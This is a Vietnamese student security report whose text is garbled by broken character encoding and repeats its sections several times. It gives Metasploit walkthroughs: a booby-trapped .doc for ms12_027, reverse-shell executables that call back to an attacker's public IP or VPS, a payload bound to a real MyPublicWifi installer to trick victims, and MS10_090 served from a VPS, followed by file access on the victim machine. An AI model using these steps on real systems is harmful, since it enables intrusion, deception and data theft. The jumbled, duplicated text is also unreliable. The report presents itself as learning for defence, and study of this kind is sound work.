hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
